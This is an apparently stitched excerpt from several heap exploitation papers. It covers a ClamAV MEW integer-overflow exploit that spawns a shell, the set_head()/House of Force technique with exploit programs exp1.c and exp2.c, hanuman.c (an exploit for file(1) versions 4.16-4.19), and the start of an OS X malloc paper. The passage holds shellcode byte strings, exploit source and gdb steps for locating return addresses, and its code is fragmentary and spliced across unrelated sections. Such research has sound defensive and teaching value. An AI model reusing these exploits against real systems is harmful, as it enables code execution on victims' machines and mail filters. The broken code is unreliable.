address points to the 'prev_size' field of the chunk being freed,
an integer under the attacker's control. What should one place
there? This is another problem that needs to be solved.
Since only a small amount of bytes is needed for the heap and the
arena headers at 0x08100000 (or similar address), one can use this
area for storing shellcode and nops as well. By setting the 'prev_size'
field of the chunk being freed equal to a JMP instruction, one can
branch some bytes ahead or backwards so that execution is transferred
somewhere in 0x08100000 but, still, after the heap and arena headers!
Valid locations are 0x08100000+X with X >= 72, that is, X should
be an offset after the heap header and after bins[0]. This is not
as complicated as it sounds, in fact, all addresses needed for
exploitation are static and can be easily precalculated!
int main() {
char buffer[65535], *arena, *chunks;
It seems that all the values for the arena named 'av' are in
position.
* An attacker must make sure that they can overflow the chunk right
next to the one under their control. For example, if the chunk from
0x080XXXXX to 0x08101000 is under control, then chunk 0x08101001-
0x0810XXXX should be overflowable (or just any chunk at 0x081XXXXX).
[heap_hdr][arena_hdr][...]|[AAAA][...]|[BBBB][...]|[CCCC]
[AAAA] -> The size of the second chunk plus PREV_INUSE and
NON_MAIN_ARENA.
* The target chunks should be larger than 64 bytes and less than
the mmap() threshold.
* An attacker must have the ability to write null bytes. That is,
one should be able to overflow the chunks via memcpy(), bcopy(),
read() or similar since strcpy() or strncpy() will not work! This
is probably the most important precondition for this technique.
When make has finished its job, we have to make sure everything is
ok by running ldd on clamscan and checking the paths to the shared
libraries.
Now let's focus on the buggy code. The actual vulnerability exists
in the preprocessing of PE (Portable Executable) files, the well
known Microsoft Windows executables. Precisely, when ClamAV attempts
to dissect the headers produced by a famous packer, called MEW, an
integer overflow occurs which later results in an exploitable
condition. Notice that this bug can be exploited using various
techniques but for demonstration purposes I'll stick to the one I
presented here. In order to have a more clear insight on how things
work, you are also advised to read the Microsoft PE/COFF specification
[13] which, surprisingly, is free for download.
First, 'ssize' and 'dsize' get their initial values which are
controlled by the attacker. These values represent the virtual size
of two contiguous sections of the PE file being scanned (don't try
to delve into the MEW packer details, since you won't find any
documentation, and it would be useless to you even if you did). The sum of
these user supplied values is used in cli_calloc() which, obviously,
is just a calloc() wrapper. This allows for an arbitrary sized heap
allocation, which can later be used in the read operation. There
are endless scenarios here, but let's see what the potential is for
achieving code execution using the new free() exploitation
technique.
0xdea00000 0xdeadbeef
...+----------+-----------+-...-+-------------+--------------+...
| Heap hdr | Arena hdr | | Chunk 'src' | Other chunks |
...+----------+-----------+-...-+-------------+--------------+...
So, if one manages to overwrite the whole region, from the heap
header to the 'src' chunk, then they can also overwrite the chunks
neighboring 'src' and perform the technique presented earlier. But
there are certain obstacles which can't be just ignored:
* Three more chunks should be present right after the 'src' chunk and
they should also be alterable by the overflow.
* One can force ClamAV not to mess with the chunks between the heap
header and the 'src' chunk. An attacker may achieve this by following
a precise vulnerable path.
* Since the heap is, by default, not randomized, one can precalculate
the 'src' value using gdb or some custom malloc() debugger (just
like I did). This specific bug is hard to exploit when randomization
is enabled. On the contrary, the general technique presented in
this article, is immune to such security measures.
free(section_hdr);
--- snip ---
if(!CLI_ISCONTAINED(exe_sections[1].rva, exe_sections[1].vsz,
cli_readint32(buff + 0x7c) + fileoffset + 0x80, 4)) {
...
free(src);
}
}
--- snip ---
So, here's what the exploit for this ClamAV bug looks like. For more
info on the exploit usage you can check the related README file in
the attachment. This code creates a specially crafted .exe file,
which, when passed to clamscan, spawns a shell.
sh-3.2$ echo yo
yo
sh-3.2$ exit
exit
--- snip ---
Anyway, all that stuff kinda exhausted me. I wouldn't have managed
to write this article without the precious help of GM, eidimon and
---[ X. References
5. The use of set_head to defeat the wilderness – g463
1 - Introduction
3 - Automation
3.1 - Define the basic properties
3.2 - Extract the formulas
3.3 - Compute the values
4 - Limitations
4.1 - Requirements of two different techniques
4.1.1 - The set_head() technique
4.1.2 - The "House of Force" technique
4.2 - Almost 4 bytes to almost anywhere technique
4.2.1 - Everything in life is a multiple of 8
4.2.2 - Top chunk's size needs to be bigger than the requested malloc
size
4.2.3 - Logical OR with PREV_INUSE
6 - Examples
6.1 - The basic scenarios
6.1.1.1 - The most basic form of the set_head() technique
6.1.1.2 - Exploit
6.1.2.1 - Multiple overwrites
6.1.2.2 - Exploit
6.2 - A real case scenario: file(1) utility
6.2.1 - The hole
6.2.2 - All the pieces fall into place
6.2.3 - hanuman.c
7 - Final words
8 - References
--[ 1 - Introduction
Many papers have been published in the past describing techniques on how to
take advantage of the in-band memory management in the GNU C Library
This paper will present the details of the technique. Also, it will show
you how to practically apply this technique to other exploits. The
limitations of the technique will also be presented. Finally, some
examples will be shown to better understand the various aspects of the
technique.
Most of the time, people who write exploits using malloc techniques are not
aware of the difficulties that the wilderness chunk implies until they face
the problem. It is only at this exact time that they realize how the known
techniques (i.e. unlink, etc.) have no effect on this particular context.
As MaXX once said [3]: "The wilderness chunk is one of the most dangerous
opponents of the attacker who tries to exploit heap mismanagement. Because
this chunk of memory is handled specially by the dlmalloc internal
routines, the attacker will rarely be able to execute arbitrary code if
they solely corrupt the boundary tag associated with the wilderness chunk."
This is not the first time that the exploitation of the wilderness chunk
has been specifically targeted. The pioneer of this type of exploitation
is Phantasmal Phantasmagoria.
The idea behind "The House of Force" is quite simple but there are specific
steps that need to be followed. Below, you will find a brief summary of
all the steps.
Step one:
The first step in the "House of Force" consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is. The preferred new size of the top chunk should be
0xffffffff. Below is an ascii graphic of the memory layout at the time
of the overflow. Notice that the location of the top chunk is somewhere in
the heap.
Step two:
The purpose of this step is to move the top chunk right before a global
offset table entry. The new location of the top chunk is the sum of the
current address of the top chunk and the value of the malloc call. This
sum is done with the following line of code:
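(These are the corresponding lines from the use_top code, quoted in full
later in this paper:)

    remainder = chunk_at_offset(victim, nb);
    av->top = remainder;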
After the malloc call, the memory layout should be similar to the
representation below:
Step three:
Now that the basic review of the "House of Force" technique is done, let's
look at the set_head() technique. The basic idea behind this technique is
to use the set_head() macro to write almost four arbitrary bytes to almost
anywhere in memory. This macro is normally used to set the value of the
size field of a memory chunk to a specific value. Let's have a peek at the
code:
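(Quoting the one-line definition from glibc's malloc.c for the versions
discussed here:)

    #define set_head(p, s)       ((p)->size = (s))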
This line is very simple to understand. It takes the memory chunk 'p',
modifies its size field, replacing it with the value of the variable 's'.
If the attacker has control of those two parameters, it may be possible to
modify the content of an arbitrary memory location with a value that he
controls.
First step:
The first step of the set_head() technique consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is. The specific value that you will overwrite with will
depend on the parameters of the exploitable situation. Below is an ascii
graphic of the memory layout at the time of the overflow. Notice that the
location of the top chunk is somewhere in the heap.
Second step:
The purpose of this step is to move the top chunk before the location that
you want to overwrite. This location needs to be on the stack, and you
will see why at section 4.2.2. During this step, the malloc code will set
the size of the new top chunk with the set_head() macro. Look at the
representation below to better understand the memory layout at the time of
the overwrite:
If you control the new location of the top chunk and the new size of the
top chunk, you can get a "write almost 4 arbitrary bytes to almost
anywhere" primitive.
The set_head macro is used many times in the malloc library. However, it's
used at one particularly interesting place where it's possible to
influence its parameters. This influence will let the attacker overwrite 4
bytes in memory with a value that he can control.
When there is a call to malloc, different methods are tried to allocate the
requested memory. MaXX did a pretty great job at explaining the malloc
algorithm in section 3.5.1 of his text[3]. Reading his text is highly
suggested before continuing with this text. Here are the main points of
the algorithm:
If those three steps fail, interesting things happen. The malloc function
tries to split the top chunk. The 'use_top' code portion is then called.
It's in that portion of code that it's possible to take advantage of a call
to set_head(). Let's analyze the use_top code:
01 Void_t*
02 _int_malloc(mstate av, size_t bytes)
03 {
04 INTERNAL_SIZE_T nb; /* normalized request size */
05
06 mchunkptr victim; /* inspected/selected chunk */
07 INTERNAL_SIZE_T size; /* its size */
08
09 mchunkptr remainder; /* remainder from a split */
10 unsigned long remainder_size; /* its size */
11
12
13 checked_request2size(bytes, nb);
14
15 [ ... ]
16
17 use_top:
18
19 victim = av->top;
20 size = chunksize(victim);
21
22 if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
23 remainder_size = size - nb;
24 remainder = chunk_at_offset(victim, nb);
25 av->top = remainder;
26 set_head(victim, nb | PREV_INUSE |
27 (av != &main_arena ? NON_MAIN_ARENA : 0));
28 set_head(remainder, remainder_size | PREV_INUSE);
29
30 check_malloced_chunk(av, victim, nb);
31 return chunk2mem(victim);
32 }
All the magic happens at line 28. By forcing a particular context inside
the application, it's possible to control set_head's parameters and then
overwrite almost any memory address with almost four arbitrary bytes.
Let's see how it's possible to control these two parameters, which are
'remainder' and 'remainder_size' :
b. Then, at line 19, the variable 'victim' gets filled with the
address of the top chunk.
Finally, at line 28, the set_head() macro modifies the size field of the
fake remainder chunk and fills it with the content of the variable
'remainder_size'. This is how you get your "write almost 4 arbitrary bytes
to almost anywhere in memory" primitive.
--[ 3 - Automation
Before trying to exploit a security hole with the set_head technique, the
attacker needs to define the parameters of the vulnerable context. These
parameters are:
2. The return address: This is the content that you will write to
The attacker has control over two things during the exploitation stage.
First, the content of the overwritten top chunk's size field and secondly,
the size parameter to the malloc call. The values that the attacker
chooses for these will determine the exact content of the variables
'remainder' and 'remainder_size' later used by the set_head() macro.
Below, two formulas are presented to help the attacker find the appropriate
values.
remainder = chunk_at_offset(victim, nb + 8)
2. The second formula is how to get the new size of the top chunk.
(i.e. retadr'):
You can now proceed with finding the exact values that you will plug into
your exploit.
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
By giving this function your return location, your return address and your
top chunk location, it will compute the exact malloc size and top chunk
size to use in your exploit. It will also tell you if it's possible to
execute the requested write operation based on the return address and the
return location you have chosen.
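A rough sketch of such a helper follows (this is not g463's original code;
it uses the struct sethead shown above, assumes <stdlib.h>, and its
constants come from the use_top math, so expect small adjustments for
request2size() rounding and the flag bits):

    struct sethead *
    compute_sethead (unsigned long retloc, unsigned long retadr,
                     unsigned long toploc)
    {
        struct sethead *shead = malloc (sizeof (struct sethead));
        unsigned long nb;

        /* set_head(remainder, ...) writes to remainder->size, i.e. to
           (toploc + nb) + 4, so nb follows from the return location */
        nb = retloc - 4 - toploc;

        /* request2size(malloc_size) must come out equal to nb */
        shead->malloc_size = nb - 4;

        /* the value written is (size - nb) | PREV_INUSE, so the top
           chunk size is overflowed with approximately retadr + nb */
        shead->topchunk_size = retadr + nb;

        return shead;
    }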
--[ 4 - Limitations
At the time of writing this paper, there was no simple and easy way to
exploit a heap overflow when the top chunk is involved. Each exploitation
technique needs a particular context to work successfully. The set_head
Minimum requirements:
This technique will let you write almost 4 arbitrary bytes to almost
anywhere.
Minimum requirements:
This technique will, in the best-case scenario, let you overwrite any
region in memory with a string of an arbitrary length that you control.
Below you will find the three main restrictions of this technique:
- checked_request2size() and
- chunksize()
Ultimately, this will have some influence on the selection of the return
location and the return address.
The memory addresses that you can overwrite with the set_head technique
need to be aligned on an 8-byte boundary. Interesting locations to
overwrite on the stack usually include a saved EIP of a stack frame or a
function pointer. These pointers are aligned on a 4-byte boundary, so with
this technique you will only be able to modify one memory address out of two.
The return address will also need to be a multiple of 8 (not counting the
logical OR with PREV_INUSE). Normally, the attacker has the possibility of
providing a NOP cushion right before his shellcode, so this is not really a
big issue.
------[ 4.2.2 - Top chunk's size needs to be bigger than the requested
malloc size
This is the main disadvantage of the set_head technique. For the top chunk
code to be triggered and serve the memory request, there is a verification
before the top chunk code is executed:
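(That verification is line 22 of the use_top listing quoted earlier:)

    if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {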
In short, this line requires that the size of the top chunk is bigger than
the size requested by the malloc call. Since the variables 'size' and 'nb'
are computed from the return location, the return address and the top
chunk's location, this greatly limits the content and the location of the
arbitrary overwrite operation. Still, a valid combination of a
return address and a return location exists.
Let's see what the values of 'size' and 'nb' will be for a given return
location and return address. Let's find out when there is a situation in which
'size' is greater than 'nb'. Consider the fact that the location of the
top chunk is static and it's at 0x080614f8:
+------------+------------++------------+------------+
| return | return || size | nb |
| location | address || | |
+------------+------------++------------+------------+
| 0x0804b150 | 0x08061000 || 134523993 | 4294876240 |
| 0x0804b150 | 0xbffffbaa || 3221133059 | 4294876240 |
| 0xbffffaaa | 0xbffffbaa || 2012864861 | 3086607786 |
| 0xbffffaaa | 0x08061000 || 3221222835 | 3086607786 | <- !!!!!
+------------+------------++------------+------------+
As you can see from this chart, the only time that you get a situation
where 'size' is greater than 'nb' is when your return location is somewhere
in the stack and when your return address is somewhere in the heap.
It was said in section 4.2.1 that the return address will always be a
multiple of 8 bytes due to the normalisation of some macros. With the
PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1. With an
NOP cushion, this problem is solved. Compared to the previous two, this
restriction is a very small one.
One way to make the exploitation process a lot more reliable is by using
multiple overwrites. Indeed, having the possibility of overwriting a
memory location with 4 bytes is good, but the possibility to write multiple
times to memory is even better[8]. Being able to overwrite multiple memory
locations with set_head will increase your chance of finding a valid return
location on the stack.
To correctly put this technique in place, the attacker will need to start
overwriting addresses at the top of the stack, and go downward until he
seizes control of the program. Here are the possible addresses that
set_head() lets you overwrite on the stack:
1: 0xbffffffc
2: 0xbffffff4
3: 0xbfffffec
4: 0xbfffffe4
5: 0xbfffffdc
6: 0xbfffffd4
7: 0xbfffffcc
8: 0xbfffffc4
9: ...
Based on the formulas that were found in section 3.3, let's compute the
values for the top chunk size and the size for the malloc call for each
overwrite operation. Let's take the following values for an example case:
+------------++------------+------------+
| return || top chunk | malloc |
| location || size | size |
+------------++------------+------------+
+------------++------------+------------+
| 0xbffffffc || 3221225725 | 3086679796 |
| 0xbffffff4 || 3221225717 | 3086679788 |
| 0xbfffffec || 3221225709 | 3086679780 |
| 0xbfffffe4 || 3221225701 | 3086679772 |
| 0xbfffffdc || 3221225693 | 3086679764 |
| 0xbfffffd4 || 3221225685 | 3086679756 |
| 0xbfffffcc || 3221225677 | 3086679748 |
| 0xbfffffc4 || 3221225669 | 3086679740 |
| ... || ... | ... |
+------------++------------+------------+
By looking at this chart, you can determine that for each overwrite
operation, the attacker would need to overwrite the size of the top chunk
with a new value and make a call to malloc with an arbitrary value. Would
it be possible to improve this a little bit? It would be great if the only
thing you needed to change between each overwrite operation was the size of
the malloc call, leaving the size of the top chunk untouched.
+------------+-----------++------------+------------+
| return | return || top chunk | malloc |
| location | address || size | size |
+------------+-----------++------------+------------+
+------------+-----------++------------+------------+
| 0xbffffffc | 0x8050200 || 3221225725 | 3086679796 |
| 0xbffffff4 | 0x8050208 || 3221225725 | 3086679788 |
| 0xbfffffec | 0x8050210 || 3221225725 | 3086679780 |
You can see that the size of the top chunk is always the same. On the
other hand, the return address changes through the multiple overwrites.
The attacker needs to have an NOP cushion big enough to adapt to this
variation.
The theory behind this technique is simple. If the attacker has the real
address of the top chunk, he will be able to write at the address
0xbffffffc but not at the address 0xc0000004.
Indeed, a write operation at the address 0xbffffffc will work because this
address is in the stack and its purpose is to store the environment
variables of the program. It does not significantly affect the behaviour
of the program, so the program will still continue to run normally.
Below, you will find the parameters of the exploitable situation to use
during the 6 write operations. The expected result is in the right column
of the chart. If you get these results, then the value used for the
location of the top chunk is the right one.
+------------+------------++--------------+
| return | return || Did it |
| location | address || segfault ? |
+------------+------------++--------------+
+------------+------------++--------------+
| 0xc0000014 | 0x07070707 || Yes |
| 0xc000000c | 0x07070707 || Yes |
| 0xc0000004 | 0x07070707 || Yes |
| 0xbffffffc | 0x07070707 || No |
| 0xbffffff4 | 0x07070707 || No |
| 0xbfffffec | 0x07070707 || No |
+------------+------------++--------------+
If the six write operations made the program segfault each time, then the
attacker is probably writing after 0xbfffffff or below the limit of the
stack.
If the 6 write operations succeeded and the program did not crash, then it
probably means that the attacker overwrote some values in the stack. In
that case, decrement the value of the top chunk location to use.
--[ 6 - Examples
The best way to learn something new is probably with the help of examples.
Below, you will find some vulnerable codes and their exploits.
This scenario is the most basic form of the application of the set_head()
technique. This is the approach that was used in the file(1) utility
exploit.
char *buffer1;
char *buffer2;
unsigned long size;
return 0;
}
--------------------------- end of scenario1.c ----------------------------
[1]: The top chunk is split and a memory region of 1024 bytes is requested.
[2]: A sprintf call is made. The destination buffer is not checked to see
if it is large enough. The top chunk can then be overwritten here.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a"
"\xc6\x2f\x40\xb3";
if ( (toploc % 8) != 0 ) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the top chunk location.",
toploc);
retadr);
return shead;
}
void
put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void
put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
char *buffer;
char malloc_size_string[20];
unsigned long retloc, retadr, toploc;
unsigned long topchunk_size, malloc_size;
struct sethead *shead;
if ( argc != 4) {
printf ("wrong number of arguments, exiting...\n\n");
printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
return 1;
}
return 0;
}
--------------------------- end of exp1.c ---------------------------------
Here are the steps to find the 3 memory values to use for this exploit.
1- The first step is to generate a core dump file from the vulnerable
program. You will then have to analyze this core dump to find the proper
values for your exploit.
To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section. Normally, the heap will
start just after the BSS section:
The BSS section starts at 0x080495e4. Let's call the exploit the following
way, and remember to replace 0x080495e4 for the BSS value you have found:
3- The ESI register contains the address of the top chunk. It might be
another register for you.
4- Start searching before the location of the top chunk to find the NOP
cushion. This will be the return address.
5- To get the return location for your exploit, get a saved EIP from a
stack frame.
(gdb) frame 2
#2 0x0804840a in main ()
(gdb) x $ebp+4
0xbffff52c: 0x4002980c
(gdb)
6- You can now call the exploit with the values that you have found.
char *buffer1;
char *buffer2;
unsigned long size;
/* [3] */ do {
size = 0;
scanf ("%u", &size);
/* [4] */ buffer2 = (char *) malloc (size);
/*
* Random code
*/
return 0;
}
------------------------- end of scenario2.c ------------------------------
[1]: A memory region of 4096 bytes is requested. The top chunk is split
and the request is serviced.
[2]: A call to fgets is made. The destination buffer is not checked to see
if it is large enough. The top chunk can then be overwritten here.
[3]: The program enters a loop. It reads from 'stdin' until the number '0'
is entered.
[4]: A call to malloc is done with 'size' as the parameter. The loop does
not end until size equals '0'. This gives the attacker the
possibility of overwriting the memory multiple times.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4f"
"\x3d\x1a\x3d\x83\xeb\xfc\xe2\xf4\x25\x36\x42\xa4\x1d\x5b\x72\x10"
"\x2c\xb4\xfd\x55\x60\x4e\x72\x3d\x27\x12\x78\x54\x21\xb4\xf9\x6f"
"\xa7\x35\x1a\x3d\x4f\x12\x78\x54\x21\x12\x73\x59\x4f\x6a\x49\xb4"
"\xae\xf0\x9a\x3d";
if ( (toploc % 8) != 0 ) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the top chunk location.",
toploc);
fprintf (stderr,
"--[ Impossible to use 0x%x as the return address.", retadr);
fprintf (stderr, " Using 0x%x instead\n", check_retadr);
} else
fprintf (stderr, "--[ Using 0x%x as the return address.\n",
retadr);
return shead;
}
void
put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void
put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
char *buffer;
char malloc_size_buffer[20];
unsigned long retloc, retadr, toploc;
unsigned long topchunk_size, malloc_size;
struct sethead *shead;
int i;
if ( argc != 4) {
printf ("wrong number of arguments, exiting...\n\n");
printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
return 1;
}
retloc = retloc - 8;
retadr = retadr + 8;
free (shead);
}
return 0;
}
--------------------------- end of exp2.c ---------------------------------
Here are the steps to find the memory values to use for this exploit.
1- The first step is to generate a core dump file from the vulnerable
program. You will then have to analyze this core dump to find the proper
values for your exploit.
To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section. Normally, the heap will
start just after the BSS section:
The BSS section starts at 0x0804964c. Let's call the exploit the following
way, and remember to replace 0x0804964c for the BSS value you have found:
(gdb)
3- The ESI register contains the address of the top chunk. It might be
another register for you.
4- For the return address, get a memory address at the beginning of the NOP
cushion:
5- You can now call the exploit with the values that you have found. The
return location will be 0xbffffffc, and it will decrement with each write.
The shellcode in exp2.c executes /bin/id.
The set_head technique was developed during the research of a security hole
in the UNIX file(1) utility. This utility is an automatic file content
type recognition tool found on many UNIX systems. The affected versions
are Ian Darwin's versions 4.00 to 4.19, maintained by Christos Zoulas;
this is the standard version of file(1) for Linux, *BSD, and other
systems.
So much energy was put into the development of this exploit mainly because
the presence of a vulnerability in this utility represents a high security
risk for an SMTP content filter.
An SMTP content filter is a system that acts after the SMTP server receives
email and applies various filtering policies defined by a network
administrator. Once the scanning process is finished, the filter decides
- Dearchivers;
- Decoders;
- Classifiers;
- Antivirus;
- and many more ...
01 protected int
02 file_printf(struct magic_set *ms, const char *fmt, ...)
03 {
04 va_list ap;
05 size_t len;
06 char *buf;
07
08 va_start(ap, fmt);
09 if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms->
o.len) {
10 va_end(ap);
11 if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) {
12 file_oomem(ms, len + 1024);
13 return -1;
14 }
15 ms->o.ptr = buf + (ms->o.ptr - ms->o.buf);
16 ms->o.buf = buf;
17 ms->o.len = ms->o.size - (ms->o.ptr - ms->o.buf);
18 ms->o.size = len + 1024;
19
20 va_start(ap, fmt);
21 len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap);
22 }
23 ms->o.ptr += len;
24 ms->o.len -= len;
25 va_end(ap);
26 return 0;
27 }
At first sight, this function seems to take good care of not overflowing
the 'ms->o.ptr' buffer. A first copy is done at line 09. If the
destination buffer, 'ms->o.buf', is not big enough to receive the character
string, the memory region is reallocated.
The reallocation is done at line 11, but the new size is not computed
properly. Indeed, the function assumes that the buffer will never need to
be bigger than the current length of the processed string plus 1024 bytes.
The real problem is at line 21. The variable 'ms->o.len' represents the
number of bytes left in 'ms->o.buf'. The variable 'len', on the other
hand, represents the number of characters (not including the trailing
'\0') which would have been written to the final string if enough space had
been available. In the event that the buffer to be printed would be larger
than 'ms->o.len', 'len' would contain a value greater than 'ms->o.len'.
Then, at line 24, 'len' would get subtracted from 'ms->o.len'. 'ms->o.len'
could underflow below 0, and it would become a very big positive integer
because 'ms->o.len' is of type 'size_t'. Subsequent vsnprintf() calls
would then receive a very big length parameter thus rendering any bound
checking capabilities useless.
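To make the arithmetic concrete, here is a minimal stand-alone sketch (not
the file(1) source) showing how a vsnprintf() return value larger than the
remaining space drives a size_t length past zero:
#include <stdio.h>
#include <stdarg.h>
static size_t append (char *dst, size_t left, const char *fmt, ...)
{
    va_list ap;
    size_t len;
    va_start (ap, fmt);
    len = vsnprintf (dst, left, fmt, ap); /* returns the would-be length,
                                             which may exceed 'left'      */
    va_end (ap);
    return len;
}
int main (void)
{
    char buf[16];
    size_t left = sizeof (buf);
    size_t len;
    /* the formatted string is longer than the 16 bytes left ... */
    len = append (buf, left, "%s", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    left -= len;   /* same pattern as line 24: the size_t wraps around */
    printf ("len = %zu, left = %zu\n", len, left);
    return 0;
}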
/*
* Extract the program name. It is at
* offset 0x7c, and is up to 32-bytes,
* including the terminating NUL.
*/
if (file_printf(ms, ", from '%.31s'",
&nbuf[doff + 0x7c]) == -1)
return size;
After a couple of tries overflowing the header of the next chunk, it was
clear that the only thing that could be overflowed was the wilderness
chunk. It was not possible to provoke a situation where a chunk that was
not adjacent to the top chunk could be overflowed with user controllable
data.
The file utility has suffered from this buffer overflow since the 4.00
release, when the first version of file_printf() was introduced. Successful
exploitation, however, was only possible starting from version 4.16, since
this version introduced a call to malloc with a user controllable variable.
From readelf.c:
This was the missing piece of the puzzle. Now, every condition is met to
use the set_head() technique.
/*
* hanuman.c
*
* file(1) exploit for version 4.16 to 4.19.
* Coded by Jean-Sebastien Guay-Leroux
* http://www.guay-leroux.com
*
*/
/*
Here are the steps to find the 3 memory values to use for the file(1)
exploit.
1- The first step is to generate a core dump file from file(1). You will
then have to analyze this core dump to find the proper values for your
exploit.
To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section:
Section Headers:
[Nr] Name Type Addr
[ 0] NULL 00000000
[ 1] .interp PROGBITS 080480f4
[...]
[22] .bss NOBITS 0804b1e0
The BSS section starts at 0x0804b1e0. Let's call the exploit the following
way, remembering to replace 0x0804b1e0 with the BSS value you have found:
3- The EAX register contains the address of the top chunk. It might be
another register for you.
4- Start searching from the location of the top chunk to find the NOP
cushion. This will be the return address.
5- To get the return location for your exploit, get a saved EIP from a
stack frame.
(gdb) frame 3
#3 0x4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192) at
readelf.c:1007
1007 if (doshn(ms, class, swap, fd,
(gdb) x $ebp+4
0xbffff7fc: 0x400172b3
(gdb)
6- You can now call the exploit with the values that you have found.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#define DEBUG 0
#define initial_ELF_garbage 75
//ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically
// linked
#define initial_netbsd_garbage 22
//, NetBSD-style, from '
#define post_netbsd_garbage 12
//' (signal 0)
struct math {
int nnetbsd;
int nname;
};
struct sethead {
unsigned long topchunk_size;
unsigned long malloc_size;
};
typedef struct
{
uint32_t sh_name;
uint32_t sh_type;
uint32_t sh_flags;
uint32_t sh_addr;
uint32_t sh_offset;
uint32_t sh_size;
uint32_t sh_link;
uint32_t sh_info;
uint32_t sh_addralign;
uint32_t sh_entsize;
} Elf32_Shdr;
typedef struct
{
uint32_t n_namesz;
uint32_t n_descsz;
uint32_t n_type;
} Elf32_Nhdr;
if ( (toploc % 8) != 0 ) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the top chunk location.",
toploc);
return shead;
}
/*
Not CPU friendly :)
*/
struct math *
compute (int offset) {
int accumulator = 0;
int i, j;
struct math *math;
if (math == NULL) {
printf ("--[ Could not allocate memory for math structure\n");
exit (1);
}
accumulator = 0;
accumulator += initial_ELF_garbage;
accumulator += (i * (initial_netbsd_garbage +
post_netbsd_garbage));
accumulator += initial_netbsd_garbage;
accumulator += j;
if (accumulator == offset) {
math->nnetbsd = i;
math->nname = j;
return math;
}
}
}
void
put_byte (char *ptr, unsigned char data) {
*ptr = data;
}
void
put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}
FILE *
open_file (char *filename) {
FILE *fp;
if (!fp) {
perror ("Cant open file");
exit (1);
return fp;
}
void
usage (char *progname) {
exit (1);
}
int
main (int argc, char *argv[]) {
FILE *fp;
Elf32_Ehdr *elfhdr;
Elf32_Shdr *elfshdr;
Elf32_Nhdr *elfnhdr;
char *filename;
char *buffer, *ptr;
int i;
struct math *math;
struct sethead *shead;
int left_bytes;
unsigned long retloc, retadr, toploc;
unsigned long topchunk_size, malloc_size;
if ( argc != 5) {
usage ( argv[0] );
}
topchunk_size = shead->topchunk_size;
malloc_size = shead->malloc_size;
ptr = buffer;
elfhdr = (Elf32_Ehdr *) ptr;
ptr += elfhdr->e_ehsize;
elfshdr = (Elf32_Shdr *) ptr;
elfshdr->sh_offset = OFFSET_SHELLCODE;
}
elfshdr++;
}
fp = open_file (filename);
if (fwrite (buffer, 8192, 1, fp) != 0 ) {
printf ("--[ The file has been written\n");
} else {
printf ("--[ Can not write to the file\n");
exit (1);
}
fclose (fp);
free (shead);
free (math);
free (buffer);
free (filename);
return 0;
}
That's all for the details of this technique; a lot has already been said
through this paper. By looking at the complexity of the malloc code, there
are probably many other ways to take control of a process by corrupting the
malloc chunks.
6. OS X heap exploitation techniques - nemo
1 - Introduction
2 - Overview of the Apple OS X userland heap implementation
2.1 - Environment Variables
2.2 - Zones
2.3 - Blocks
2.4 - Heap initialization
3 - A sample overflow
4 - A real life example (WebKit)
5 - Miscellaneous
5.1 - Wrap-around Bug
5.2 - Double free()'s
5.3 - Beating ptrace()
6 - Conclusion
7 - References
--[ 1 - Introduction.
The malloc() implementation found in Apple's Libc-391 and earlier (at the
time of writing this) is written by Bertrand Serlet. It is a relatively
complex memory allocator made up of memory "zones", which are variable
size portions of virtual memory, and "blocks", which are allocated from
within these zones. It is possible to have multiple zones, however most
applications tend to stick to just using the default zone.
The source for the implementation of the Apple malloc() is available from
[6]. (The current version of the source at the time of writing this is
10.4.1).
To access it you need to be a member of the ADC, which is free to sign up.
(or if you can't be bothered signing up use the login/password from
Bug Me Not [7] ;)
We will now look at the variables which are of the most use to us when
exploiting an overflow.
NOTE: The "heap" tool can be used to inspect the current heap of a
process the Zones are displayed as well as any objects which are
currently allocated. This tool can be used without setting an
environment variable.
A single zone can be thought of as a single heap. When the zone is destroyed
all the blocks allocated within it are free()'ed. Zones allow blocks with
similar attributes to be placed together. The zone itself is described by
a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown
below:
[malloc_zone_t struct]
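The full listing is not reproduced here; the following abbreviated sketch
(based on the malloc.h of that era, the exact field list may vary between
Libc versions) shows the part that matters for exploitation, namely the
function pointers:
#include <stddef.h>
/* abbreviated sketch of malloc_zone_t; only the overall shape matters */
typedef struct _malloc_zone_t {
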